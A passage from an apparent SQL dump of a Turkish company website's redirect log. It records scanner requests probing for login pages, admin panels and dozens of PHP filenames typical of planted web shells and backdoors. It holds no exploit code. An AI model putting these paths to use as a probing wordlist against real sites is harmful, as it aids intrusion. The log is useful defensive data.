00:00:00',301),(48573,'http://3s-technologies.com.tr/tr/fifi.php',NULL,'','',4,0,'2025-10-31 13:25:25','0000-00-00 00:00:00',301),(48574,'http://3s-technologies.com.tr/tr/fifii.php',NULL,'','',4,0,'2025-10-31 13:25:25','0000-00-00 00:00:00',301),(48575,'http://3s-technologies.com.tr/tr/700.php',NULL,'','',5,0,'2025-10-31 13:25:26','0000-00-00 00:00:00',301),(48576,'http://3s-technologies.com.tr/tr/wteed.php',NULL,'','',4,0,'2025-10-31 13:25:30','0000-00-00 00:00:00',301),(48577,'http://3s-technologies.com.tr/tr/wp-rss4.php',NULL,'','',5,0,'2025-10-31 13:25:31','0000-00-00 00:00:00',301),(48578,'http://3s-technologies.com.tr/tr/4563.php',NULL,'','',5,0,'2025-10-31 13:25:32','0000-00-00 00:00:00',301),(48579,'http://3s-technologies.com.tr/tr/zr.php',NULL,'','',7,0,'2025-10-31 13:25:34','0000-00-00 00:00:00',301),(48580,'http://3s-technologies.com.tr/tr/2020.php',NULL,'','',4,0,'2025-10-31 13:25:35','0000-00-00 00:00:00',301),(48581,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/feed/',NULL,'','',2,0,'2025-10-31 16:54:36','0000-00-00 00:00:00',301),(48582,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/xmlrpc.php?rsd',NULL,'','',2,0,'2025-10-31 16:54:36','0000-00-00 00:00:00',301),(48583,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/blog/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:36','0000-00-00 00:00:00',301),(48584,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/web/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:37','0000-00-00 00:00:00',301),(48585,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/wordpress/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:37','0000-00-00 00:00:00',301),(48586,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/wp/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:38','0000-00-00 00:00:00',301),(48587,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/2020/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:38','0000-00-00 00:00:00',301),(48588,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/2019/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:39','0000-00-00 00:00:00',301),(48589,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/2021/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:39','0000-00-00 00:00:00',301),(48590,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/shop/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:40','0000-00-00 00:00:00',301),(48591,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/wp1/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:40','0000-00-00 00:00:00',301),(48592,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/test/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:41','0000-00-00 00:00:00',301),(48593,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/site/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:41','0000-00-00 00:00:00',301),(48594,'http://3s-technologies.com.tr/en/wp-includes/id3/license.txt/cms/wp-includes/wlwmanifest.xml',NULL,'','',2,0,'2025-10-31 16:54:42','0000-00-00 00:00:00',301),(48595,'https://3s-technologies.com.tr/en/wp-login',NULL,'','',15,0,'2025-10-31 22:47:06','0000-00-00 00:00:00',301),(48596,'https://3s-technologies.com.tr/en/blog/wp-login.php',NULL,'','',15,0,'2025-10-31 22:47:07','0000-00-00 00:00:00',301),(48597,'https://3s-technologies.com.tr/en/cms/wp-login.php',NULL,'','',15,0,'2025-10-31 22:47:08','0000-00-00 00:00:00',301),(48598,'http://3s-technologies.com.tr/en/wp-login',NULL,'','',14,0,'2025-10-31 22:47:11','0000-00-00 00:00:00',301),(48599,'http://3s-technologies.com.tr/en/cms/wp-login.php',NULL,'','',14,0,'2025-10-31 22:47:13','0000-00-00 00:00:00',301),(48600,'http://3s-technologies.com.tr/tr/employer/login',NULL,'','',1,0,'2025-11-01 01:01:21','0000-00-00 00:00:00',301),(48601,'http://3s-technologies.com.tr/tr/company/login',NULL,'','',1,0,'2025-11-01 01:01:22','0000-00-00 00:00:00',301),(48602,'http://3s-technologies.com.tr/tr/users/login',NULL,'','',1,0,'2025-11-01 01:01:24','0000-00-00 00:00:00',301),(48603,'http://3s-technologies.com.tr/tr/account/login',NULL,'','',1,0,'2025-11-01 01:01:25','0000-00-00 00:00:00',301),(48604,'http://3s-technologies.com.tr/tr/portal/login',NULL,'','',1,0,'2025-11-01 01:01:26','0000-00-00 00:00:00',301),(48605,'http://3s-technologies.com.tr/tr/signin',NULL,'','',1,0,'2025-11-01 01:01:27','0000-00-00 00:00:00',301),(48606,'http://3s-technologies.com.tr/tr/signup',NULL,'','',1,0,'2025-11-01 01:01:29','0000-00-00 00:00:00',301),(48607,'http://3s-technologies.com.tr/tr/admin/signin',NULL,'','',1,0,'2025-11-01 01:01:31','0000-00-00 00:00:00',301),(48608,'http://3s-technologies.com.tr/tr/admin/auth',NULL,'','',1,0,'2025-11-01 01:01:32','0000-00-00 00:00:00',301),(48609,'http://3s-technologies.com.tr/tr/auth/admin',NULL,'','',1,0,'2025-11-01 01:01:34','0000-00-00 00:00:00',301),(48610,'http://3s-technologies.com.tr/tr/auth/user',NULL,'','',1,0,'2025-11-01 01:01:35','0000-00-00 00:00:00',301),(48611,'http://3s-technologies.com.tr/tr/access/login',NULL,'','',1,0,'2025-11-01 01:01:36','0000-00-00 00:00:00',301),(48612,'http://3s-technologies.com.tr/tr/backend',NULL,'','',1,0,'2025-11-01 01:01:37','0000-00-00 00:00:00',301),(48613,'http://3s-technologies.com.tr/tr/backend/login',NULL,'','',1,0,'2025-11-01 01:01:38','0000-00-00 00:00:00',301),(48614,'http://3s-technologies.com.tr/tr/manage',NULL,'','',1,0,'2025-11-01 01:01:39','0000-00-00 00:00:00',301),(48615,'http://3s-technologies.com.tr/tr/management',NULL,'','',1,0,'2025-11-01 01:01:40','0000-00-00 00:00:00',301),(48616,'http://3s-technologies.com.tr/tr/admin-area',NULL,'','',1,0,'2025-11-01 01:01:41','0000-00-00 00:00:00',301),(48617,'http://3s-technologies.com.tr/tr/adminpanel',NULL,'','',1,0,'2025-11-01 01:01:42','0000-00-00 00:00:00',301),(48618,'http://3s-technologies.com.tr/tr/api/user',NULL,'','',1,0,'2025-11-01 01:01:43','0000-00-00 00:00:00',301),(48619,'http://3s-technologies.com.tr/tr/api/login',NULL,'','',1,0,'2025-11-01 01:01:44','0000-00-00 00:00:00',301),(48620,'http://3s-technologies.com.tr/tr/api/auth',NULL,'','',1,0,'2025-11-01 01:01:45','0000-00-00 00:00:00',301),(48621,'http://3s-technologies.com.tr/tr/api/admin',NULL,'','',1,0,'2025-11-01 01:01:46','0000-00-00 00:00:00',301),(48622,'http://3s-technologies.com.tr/tr/admin/dashboard',NULL,'','',1,0,'2025-11-01 01:01:47','0000-00-00 00:00:00',301),(48623,'http://3s-technologies.com.tr/tr/admin/home',NULL,'','',1,0,'2025-11-01 01:01:48','0000-00-00 00:00:00',301),(48624,'http://3s-technologies.com.tr/tr/admin/secure',NULL,'','',1,0,'2025-11-01 01:01:49','0000-00-00 00:00:00',301),(48625,'http://3s-technologies.com.tr/tr/adminpanel/login',NULL,'','',1,0,'2025-11-01 01:01:50','0000-00-00 00:00:00',301),(48626,'http://3s-technologies.com.tr/tr/staff/login',NULL,'','',1,0,'2025-11-01 01:01:51','0000-00-00 00:00:00',301),(48627,'http://3s-technologies.com.tr/tr/team/login',NULL,'','',1,0,'2025-11-01 01:01:52','0000-00-00 00:00:00',301),(48628,'https://www.3s-technologies.com.tr/tr/assets/blt2a9d21fb69875fd4/blt53d566bc2d5b4519/67c36395c1fe960584550246/landing.svg',NULL,'https://www.3s-technologies.com.tr/assets/blt2a9d21fb69875fd4/blt53d566bc2d5b4519/67c36395c1fe960584550246/landing.svg','',1,0,'2025-11-01 07:53:01','0000-00-00 00:00:00',301),(48629,'https://3s-technologies.com.tr/en/management',NULL,'https://yandex.com/','',1,0,'2025-11-01 11:26:07','0000-00-00 00:00:00',301),(48630,'https://3s-technologies.com.tr/tr/news_sitemap.xml',NULL,'','',1,0,'2025-11-01 12:03:24','0000-00-00 00:00:00',301),(48631,'https://3s-technologies.com.tr/tr/news-sitemap.xml',NULL,'','',2,0,'2025-11-01 12:17:39','0000-00-00 00:00:00',301),(48632,'https://3s-technologies.com.tr/tr/sitemap.html',NULL,'','',1,0,'2025-11-01 15:53:11','0000-00-00 00:00:00',301),(48633,'http://www.3s-technologies.com.tr/tr/update/f35.php',NULL,'','',10,0,'2025-11-02 07:00:27','0000-00-00 00:00:00',301),(48634,'http://www.3s-technologies.com.tr/tr/wp-content/packed.php',NULL,'','',5,0,'2025-11-02 07:00:28','0000-00-00 00:00:00',301),(48635,'http://www.3s-technologies.com.tr/tr/sto.php',NULL,'','',5,0,'2025-11-02 07:00:30','0000-00-00 00:00:00',301),(48636,'http://www.3s-technologies.com.tr/tr/.well-known/log.php',NULL,'','',5,0,'2025-11-02 07:00:32','0000-00-00 00:00:00',301),(48637,'http://www.3s-technologies.com.tr/tr/uploadx.php',NULL,'','',1,0,'2025-11-02 07:00:38','0000-00-00 00:00:00',301),(48638,'http://www.3s-technologies.com.tr/tr/af4.php',NULL,'','',1,0,'2025-11-02 07:00:43','0000-00-00 00:00:00',301),(48639,'http://www.3s-technologies.com.tr/tr/.bod/.ll/ss.php',NULL,'','',2,0,'2025-11-02 07:00:45','0000-00-00 00:00:00',301),(48640,'http://www.3s-technologies.com.tr/tr/gdn.php',NULL,'','',8,0,'2025-11-02 07:00:47','0000-00-00 00:00:00',301),(48641,'http://www.3s-technologies.com.tr/tr/manager.php',NULL,'','',10,0,'2025-11-02 07:00:51','0000-00-00 00:00:00',301),(48642,'http://www.3s-technologies.com.tr/tr/wp-includes/ixr/about.php',NULL,'','',4,0,'2025-11-02 07:00:53','0000-00-00 00:00:00',301),(48643,'http://www.3s-technologies.com.tr/tr/wp-content/themes/aahana/json.php',NULL,'','',2,0,'2025-11-02 07:00:56','0000-00-00 00:00:00',301),(48644,'http://www.3s-technologies.com.tr/tr/db.php',NULL,'','',7,0,'2025-11-02 07:00:58','0000-00-00 00:00:00',301),(48645,'http://www.3s-technologies.com.tr/tr/men.php',NULL,'','',1,0,'2025-11-02 07:01:00','0000-00-00 00:00:00',301),(48646,'http://www.3s-technologies.com.tr/tr/media.php',NULL,'','',4,0,'2025-11-02 07:01:01','0000-00-00 00:00:00',301),(48647,'http://www.3s-technologies.com.tr/tr/uplozyu.php',NULL,'','',2,0,'2025-11-02 07:01:02','0000-00-00 00:00:00',301),(48648,'http://www.3s-technologies.com.tr/tr/wp-includes/text/wp-conflg.php',NULL,'','',2,0,'2025-11-02 07:01:03','0000-00-00 00:00:00',301),(48649,'http://www.3s-technologies.com.tr/tr/system.php',NULL,'','',9,0,'2025-11-02 07:01:05','0000-00-00 00:00:00',301),(48650,'http://www.3s-technologies.com.tr/tr/bala.php',NULL,'','',1,0,'2025-11-02 07:01:07','0000-00-00 00:00:00',301),(48651,'http://www.3s-technologies.com.tr/tr/item.php',NULL,'','',8,0,'2025-11-02 07:01:08','0000-00-00 00:00:00',301),(48652,'http://www.3s-technologies.com.tr/tr/file22.php',NULL,'','',1,0,'2025-11-02 07:01:09','0000-00-00 00:00:00',301),(48653,'http://www.3s-technologies.com.tr/tr/uploat.php',NULL,'','',2,0,'2025-11-02 07:01:16','0000-00-00 00:00:00',301),(48654,'http://www.3s-technologies.com.tr/tr/wp-includes/style-engine/index.php',NULL,'','',5,0,'2025-11-02 07:01:17','0000-00-00 00:00:00',301),(48655,'http://www.3s-technologies.com.tr/tr/wp-admin/log.php',NULL,'','',1,0,'2025-11-02 07:01:19','0000-00-00 00:00:00',301),(48656,'http://www.3s-technologies.com.tr/tr/oxvrws.php',NULL,'','',2,0,'2025-11-02 07:01:20','0000-00-00 00:00:00',301),(48657,'http://www.3s-technologies.com.tr/tr/sk25_1.php',NULL,'','',2,0,'2025-11-02 07:01:24','0000-00-00 00:00:00',301),(48658,'http://www.3s-technologies.com.tr/tr/css/xp.php',NULL,'','',2,0,'2025-11-02 07:01:26','0000-00-00 00:00:00',301),(48659,'http://www.3s-technologies.com.tr/tr/as/function.php',NULL,'','',1,0,'2025-11-02 07:01:29','0000-00-00 00:00:00',301),(48660,'http://www.3s-technologies.com.tr/tr/tentang_rmol.php',NULL,'','',1,0,'2025-11-02 07:01:32','0000-00-00 00:00:00',301),(48661,'http://www.3s-technologies.com.tr/tr/cc.php',NULL,'','',6,0,'2025-11-02 07:01:34','0000-00-00 00:00:00',301),(48662,'http://www.3s-technologies.com.tr/tr/file5.php',NULL,'','',5,0,'2025-11-02 07:01:35','0000-00-00 00:00:00',301),(48663,'https://3s-technologies.com.tr/tr/sitemap.aspx',NULL,'','',1,0,'2025-11-02 11:43:21','0000-00-00 00:00:00',301),(48664,'https://www.3s-technologies.com.tr/tr/thee-eclipse/zkudziol0zci9lli_svgwebpageato.svg',NULL,'https://www.3s-technologies.com.tr/thee-eclipse/ZkUdziol0Zci9LlI_SVGWEBPAGEATO.svg','',1,0,'2025-11-02 23:25:27','0000-00-00 00:00:00',301),(48665,'http://mail.3s-technologies.com.tr/tr/htaccess.php',NULL,'','',20,0,'2025-11-03 20:38:16','0000-00-00 00:00:00',301),(48666,'http://mail.3s-technologies.com.tr/tr/file30.php',NULL,'','',9,0,'2025-11-03 20:38:17','0000-00-00 00:00:00',301),(48667,'http://mail.3s-technologies.com.tr/tr/tajj.php',NULL,'','',3,0,'2025-11-03 20:38:19','0000-00-00 00:00:00',301),(48668,'http://mail.3s-technologies.com.tr/tr/fdd2.php',NULL,'','',3,0,'2025-11-03 20:38:20','0000-00-00 00:00:00',301),(48669,'http://mail.3s-technologies.com.tr/tr/fh26.php',NULL,'','',3,0,'2025-11-03 20:38:22','0000-00-00 00:00:00',301),(48670,'http://mail.3s-technologies.com.tr/tr/ixj.php',NULL,'','',3,0,'2025-11-03 20:38:23','0000-00-00 00:00:00',301),(48671,'http://mail.3s-technologies.com.tr/tr/x23.php',NULL,'','',3,0,'2025-11-03 20:38:23','0000-00-00 00:00:00',301),(48672,'http://mail.3s-technologies.com.tr/tr/0xs.php',NULL,'','',3,0,'2025-11-03 20:38:24','0000-00-00 00:00:00',301),(48673,'http://mail.3s-technologies.com.tr/tr/zeiss.php',NULL,'','',3,0,'2025-11-03 20:38:24','0000-00-00 00:00:00',301),(48674,'http://mail.3s-technologies.com.tr/tr/x0x.php',NULL,'','',3,0,'2025-11-03 20:38:25','0000-00-00 00:00:00',301),(48675,'http://mail.3s-technologies.com.tr/tr/adin.php',NULL,'','',3,0,'2025-11-03 20:38:25','0000-00-00 00:00:00',301),(48676,'http://mail.3s-technologies.com.tr/tr/max.php',NULL,'','',6,0,'2025-11-03 20:38:26','0000-00-00 00:00:00',301),(48677,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/astra/inc/ki1k.php',NULL,'','',5,0,'2025-11-03 20:38:29','0000-00-00 00:00:00',301),(48678,'http://mail.3s-technologies.com.tr/tr/alfa_data/index.php',NULL,'','',3,0,'2025-11-03 20:38:29','0000-00-00 00:00:00',301),(48679,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/about.php',NULL,'','',28,0,'2025-11-03 20:38:30','0000-00-00 00:00:00',301),(48680,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/wp-conflg.php?p=',NULL,'','',1,0,'2025-11-03 20:38:30','0000-00-00 00:00:00',301),(48681,'http://mail.3s-technologies.com.tr/tr/click.php',NULL,'','',28,0,'2025-11-03 20:38:31','0000-00-00 00:00:00',301),(48682,'http://mail.3s-technologies.com.tr/tr/0x1949.php',NULL,'','',2,0,'2025-11-03 20:38:35','0000-00-00 00:00:00',301),(48683,'http://mail.3s-technologies.com.tr/tr/bs1.php',NULL,'','',22,0,'2025-11-03 20:38:37','0000-00-00 00:00:00',301),(48684,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/wp-login.php',NULL,'','',22,0,'2025-11-03 20:38:38','0000-00-00 00:00:00',301),(48685,'http://mail.3s-technologies.com.tr/tr/termps.php',NULL,'','',1,0,'2025-11-03 20:38:38','0000-00-00 00:00:00',301),(48686,'http://mail.3s-technologies.com.tr/tr/wp-content/function.php',NULL,'','',1,0,'2025-11-03 20:38:43','0000-00-00 00:00:00',301),(48687,'http://mail.3s-technologies.com.tr/tr/wp-content/index.php',NULL,'','',48,0,'2025-11-03 20:38:45','0000-00-00 00:00:00',301),(48688,'http://mail.3s-technologies.com.tr/tr/moon.php',NULL,'','',46,0,'2025-11-03 20:38:49','0000-00-00 00:00:00',301),(48689,'http://mail.3s-technologies.com.tr/tr/themes/twentytwentytwo/index.php',NULL,'','',17,0,'2025-11-03 20:38:55','0000-00-00 00:00:00',301),(48690,'http://mail.3s-technologies.com.tr/tr/js/fm.php',NULL,'','',12,0,'2025-11-03 20:38:58','0000-00-00 00:00:00',301),(48691,'http://mail.3s-technologies.com.tr/tr/plugins/cache/footer.php',NULL,'','',16,0,'2025-11-03 20:38:59','0000-00-00 00:00:00',301),(48692,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/index.php',NULL,'','',54,0,'2025-11-03 20:39:01','0000-00-00 00:00:00',301),(48693,'http://mail.3s-technologies.com.tr/tr/sx.php',NULL,'','',30,0,'2025-11-03 20:39:01','0000-00-00 00:00:00',301),(48694,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/admin.php',NULL,'','',30,0,'2025-11-03 20:39:02','0000-00-00 00:00:00',301),(48695,'http://mail.3s-technologies.com.tr/tr/.well-known/index.php',NULL,'','',33,0,'2025-11-03 20:39:08','0000-00-00 00:00:00',301),(48696,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/seotheme/mar.php',NULL,'','',19,0,'2025-11-03 20:39:09','0000-00-00 00:00:00',301),(48697,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/plugins.php',NULL,'','',19,0,'2025-11-03 20:39:10','0000-00-00 00:00:00',301),(48698,'http://mail.3s-technologies.com.tr/tr/wp-includes/id3/about.php',NULL,'','',25,0,'2025-11-03 20:39:11','0000-00-00 00:00:00',301),(48699,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/wp-login.php',NULL,'','',18,0,'2025-11-03 20:39:13','0000-00-00 00:00:00',301),(48700,'http://mail.3s-technologies.com.tr/tr/wp-includes/requests/text/admin.php',NULL,'','',1,0,'2025-11-03 20:39:15','0000-00-00 00:00:00',301),(48701,'http://mail.3s-technologies.com.tr/tr/wp-includes/customize/about.php',NULL,'','',17,0,'2025-11-03 20:39:16','0000-00-00 00:00:00',301),(48702,'http://mail.3s-technologies.com.tr/tr/uploads/autoload_classmap.php',NULL,'','',17,0,'2025-11-03 20:39:17','0000-00-00 00:00:00',301),(48703,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/dist/preferences/wp-login.php',NULL,'','',1,0,'2025-11-03 20:39:18','0000-00-00 00:00:00',301),(48704,'http://mail.3s-technologies.com.tr/tr/wp-includes/style-engine/about.php',NULL,'','',19,0,'2025-11-03 20:39:18','0000-00-00 00:00:00',301),(48705,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/mariju.php',NULL,'','',1,0,'2025-11-03 20:39:19','0000-00-00 00:00:00',301),(48706,'http://mail.3s-technologies.com.tr/tr/wp-includes/theme-compat/chosen.php',NULL,'','',2,0,'2025-11-03 20:39:20','0000-00-00 00:00:00',301),(48707,'http://mail.3s-technologies.com.tr/tr/css/colors/blue/index.php',NULL,'','',17,0,'2025-11-03 20:39:22','0000-00-00 00:00:00',301),(48708,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/pwnd/as.php',NULL,'','',21,0,'2025-11-03 20:39:22','0000-00-00 00:00:00',301),(48709,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/index.php',NULL,'','',38,0,'2025-11-03 20:39:24','0000-00-00 00:00:00',301),(48710,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade/about.php',NULL,'','',19,0,'2025-11-03 20:39:25','0000-00-00 00:00:00',301),(48711,'http://mail.3s-technologies.com.tr/tr/wp-content/radio.php',NULL,'','',36,0,'2025-11-03 20:39:26','0000-00-00 00:00:00',301),(48712,'http://mail.3s-technologies.com.tr/tr/wp-includes/fonts/index.php?p=',NULL,'','',1,0,'2025-11-03 20:39:26','0000-00-00 00:00:00',301),(48713,'http://mail.3s-technologies.com.tr/tr/.well-known/gecko-litespeed.php',NULL,'','',5,0,'2025-11-03 20:39:27','0000-00-00 00:00:00',301),(48714,'http://mail.3s-technologies.com.tr/tr/.well-known/admin.php',NULL,'','',21,0,'2025-11-03 20:39:27','0000-00-00 00:00:00',301),(48715,'http://mail.3s-technologies.com.tr/tr/wp-content/admin.php',NULL,'','',101,0,'2025-11-03 20:39:28','0000-00-00 00:00:00',301),(48716,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/admin.php',NULL,'','',28,0,'2025-11-03 20:39:28','0000-00-00 00:00:00',301),(48717,'http://mail.3s-technologies.com.tr/tr/bge.php',NULL,'','',3,0,'2025-11-03 20:39:33','0000-00-00 00:00:00',301),(48718,'http://mail.3s-technologies.com.tr/tr/kairolin.php',NULL,'','',3,0,'2025-11-03 20:39:35','0000-00-00 00:00:00',301),(48719,'http://mail.3s-technologies.com.tr/tr/siln.php',NULL,'','',6,0,'2025-11-03 20:39:35','0000-00-00 00:00:00',301),(48720,'http://mail.3s-technologies.com.tr/tr/18299.php',NULL,'','',4,0,'2025-11-03 20:39:36','0000-00-00 00:00:00',301),(48721,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/zmfm.php',NULL,'','',3,0,'2025-11-04 02:56:08','0000-00-00 00:00:00',301),(48722,'http://3s-technologies.com.tr/tr/neshe.php',NULL,'','',5,0,'2025-11-04 12:21:28','0000-00-00 00:00:00',301),(48723,'http://mail.3s-technologies.com.tr/tr/fs6.php',NULL,'','',8,0,'2025-11-04 12:29:01','0000-00-00 00:00:00',301),(48724,'http://mail.3s-technologies.com.tr/tr/qrops.php',NULL,'','',1,0,'2025-11-04 12:29:01','0000-00-00 00:00:00',301),(48725,'http://mail.3s-technologies.com.tr/tr/about25.php',NULL,'','',1,0,'2025-11-04 12:29:02','0000-00-00 00:00:00',301),(48726,'http://mail.3s-technologies.com.tr/tr/testo.php',NULL,'','',1,0,'2025-11-04 12:29:03','0000-00-00 00:00:00',301),(48727,'http://mail.3s-technologies.com.tr/tr/blox.php',NULL,'','',6,0,'2025-11-04 12:29:04','0000-00-00 00:00:00',301),(48728,'http://mail.3s-technologies.com.tr/tr/cvrvk.php',NULL,'','',1,0,'2025-11-04 12:29:04','0000-00-00 00:00:00',301),(48729,'http://mail.3s-technologies.com.tr/tr/zicgg.php',NULL,'','',1,0,'2025-11-04 12:29:06','0000-00-00 00:00:00',301),(48730,'http://mail.3s-technologies.com.tr/tr/shelp.php',NULL,'','',5,0,'2025-11-04 12:29:06','0000-00-00 00:00:00',301),(48731,'http://mail.3s-technologies.com.tr/tr/puvil.php',NULL,'','',1,0,'2025-11-04 12:29:07','0000-00-00 00:00:00',301),(48732,'http://mail.3s-technologies.com.tr/tr/hans.php',NULL,'','',6,0,'2025-11-04 12:29:08','0000-00-00 00:00:00',301),(48733,'http://mail.3s-technologies.com.tr/tr/yas.php',NULL,'','',19,0,'2025-11-04 12:29:08','0000-00-00 00:00:00',301),(48734,'http://mail.3s-technologies.com.tr/tr/wp-blog.php',NULL,'','',52,0,'2025-11-04 16:55:40','0000-00-00 00:00:00',301),(48735,'http://mail.3s-technologies.com.tr/tr/witmmm.php',NULL,'','',2,0,'2025-11-04 16:55:41','0000-00-00 00:00:00',301),(48736,'http://mail.3s-technologies.com.tr/tr/zxasd.php',NULL,'','',2,0,'2025-11-04 16:55:43','0000-00-00 00:00:00',301),(48737,'http://mail.3s-technologies.com.tr/tr/nxx.php',NULL,'','',2,0,'2025-11-04 16:55:44','0000-00-00 00:00:00',301),(48738,'http://mail.3s-technologies.com.tr/tr/shlo.php',NULL,'','',9,0,'2025-11-04 16:55:45','0000-00-00 00:00:00',301),(48739,'http://mail.3s-technologies.com.tr/tr/marvins.php',NULL,'','',7,0,'2025-11-04 16:55:47','0000-00-00 00:00:00',301),(48740,'http://mail.3s-technologies.com.tr/tr/wpfile.php',NULL,'','',2,0,'2025-11-04 16:55:48','0000-00-00 00:00:00',301),(48741,'http://mail.3s-technologies.com.tr/tr/foyhd.php',NULL,'','',2,0,'2025-11-04 16:55:49','0000-00-00 00:00:00',301),(48742,'http://mail.3s-technologies.com.tr/tr/f350.php',NULL,'','',2,0,'2025-11-04 16:55:49','0000-00-00 00:00:00',301),(48743,'http://mail.3s-technologies.com.tr/tr/cmkhk.php',NULL,'','',2,0,'2025-11-04 16:55:53','0000-00-00 00:00:00',301),(48744,'http://mail.3s-technologies.com.tr/tr/rtg.php',NULL,'','',4,0,'2025-11-04 16:55:55','0000-00-00 00:00:00',301),(48745,'http://mail.3s-technologies.com.tr/tr/tools.php',NULL,'','',4,0,'2025-11-04 16:55:55','0000-00-00 00:00:00',301),(48746,'http://mail.3s-technologies.com.tr/tr/term.php',NULL,'','',38,0,'2025-11-04 16:55:56','0000-00-00 00:00:00',301),(48747,'http://mail.3s-technologies.com.tr/tr/fluentform.php',NULL,'','',2,0,'2025-11-04 16:55:57','0000-00-00 00:00:00',301),(48748,'http://mail.3s-technologies.com.tr/tr/agqpec.php',NULL,'','',2,0,'2025-11-04 16:55:58','0000-00-00 00:00:00',301),(48749,'http://mail.3s-technologies.com.tr/tr/byuri.php',NULL,'','',2,0,'2025-11-04 16:55:59','0000-00-00 00:00:00',301),(48750,'http://mail.3s-technologies.com.tr/tr/oiko6u.php',NULL,'','',3,0,'2025-11-04 16:56:01','0000-00-00 00:00:00',301),(48751,'http://mail.3s-technologies.com.tr/tr/wp-admin/oiko6u.php',NULL,'','',2,0,'2025-11-04 16:56:02','0000-00-00 00:00:00',301),(48752,'http://mail.3s-technologies.com.tr/tr/crew.php',NULL,'','',2,0,'2025-11-04 16:56:08','0000-00-00 00:00:00',301),(48753,'http://mail.3s-technologies.com.tr/tr/sx_pms.php',NULL,'','',4,0,'2025-11-04 16:56:11','0000-00-00 00:00:00',301),(48754,'http://mail.3s-technologies.com.tr/tr/btex.php',NULL,'','',2,0,'2025-11-04 16:56:12','0000-00-00 00:00:00',301),(48755,'http://mail.3s-technologies.com.tr/tr/ms.php',NULL,'','',43,0,'2025-11-04 16:56:13','0000-00-00 00:00:00',301),(48756,'http://mail.3s-technologies.com.tr/tr/lptlo.php',NULL,'','',2,0,'2025-11-04 16:56:14','0000-00-00 00:00:00',301),(48757,'http://mail.3s-technologies.com.tr/tr/misc.php',NULL,'','',4,0,'2025-11-04 16:56:15','0000-00-00 00:00:00',301),(48758,'http://mail.3s-technologies.com.tr/tr/xlluw.php',NULL,'','',2,0,'2025-11-04 16:56:16','0000-00-00 00:00:00',301),(48759,'http://mail.3s-technologies.com.tr/tr/qa.php',NULL,'','',2,0,'2025-11-04 16:56:19','0000-00-00 00:00:00',301),(48760,'http://mail.3s-technologies.com.tr/tr/auot.php',NULL,'','',2,0,'2025-11-04 16:56:20','0000-00-00 00:00:00',301),(48761,'http://mail.3s-technologies.com.tr/tr/codex.php',NULL,'','',2,0,'2025-11-04 16:56:22','0000-00-00 00:00:00',301),(48762,'http://mail.3s-technologies.com.tr/tr/ymq4nt.php',NULL,'','',2,0,'2025-11-04 16:56:23','0000-00-00 00:00:00',301),(48763,'http://mail.3s-technologies.com.tr/tr/inzrw.php',NULL,'','',4,0,'2025-11-04 16:56:24','0000-00-00 00:00:00',301),(48764,'http://mail.3s-technologies.com.tr/tr/ca.php',NULL,'','',5,0,'2025-11-04 16:56:25','0000-00-00 00:00:00',301),(48765,'http://mail.3s-technologies.com.tr/tr/lx.php',NULL,'','',3,0,'2025-11-04 16:56:26','0000-00-00 00:00:00',301),(48766,'http://mail.3s-technologies.com.tr/tr/iuoqc.php',NULL,'','',2,0,'2025-11-04 16:56:27','0000-00-00 00:00:00',301),(48767,'http://mail.3s-technologies.com.tr/tr/qufsq.php',NULL,'','',2,0,'2025-11-04 16:56:29','0000-00-00 00:00:00',301),(48768,'http://mail.3s-technologies.com.tr/tr/155.php',NULL,'','',41,0,'2025-11-04 16:56:30','0000-00-00 00:00:00',301),(48769,'http://mail.3s-technologies.com.tr/tr/sosu.php',NULL,'','',2,0,'2025-11-04 16:56:31','0000-00-00 00:00:00',301),(48770,'http://mail.3s-technologies.com.tr/tr/zero.php',NULL,'','',4,0,'2025-11-04 16:56:32','0000-00-00 00:00:00',301),(48771,'http://mail.3s-technologies.com.tr/tr/c4.php',NULL,'','',9,0,'2025-11-04 16:56:34','0000-00-00 00:00:00',301),(48772,'http://mail.3s-technologies.com.tr/tr/700.php',NULL,'','',2,0,'2025-11-04 16:56:35','0000-00-00 00:00:00',301),(48773,'http://mail.3s-technologies.com.tr/tr/l.php',NULL,'','',2,0,'2025-11-04 16:56:36','0000-00-00 00:00:00',301),(48774,'http://mail.3s-technologies.com.tr/tr/oddtd.php',NULL,'','',2,0,'2025-11-04 16:56:37','0000-00-00 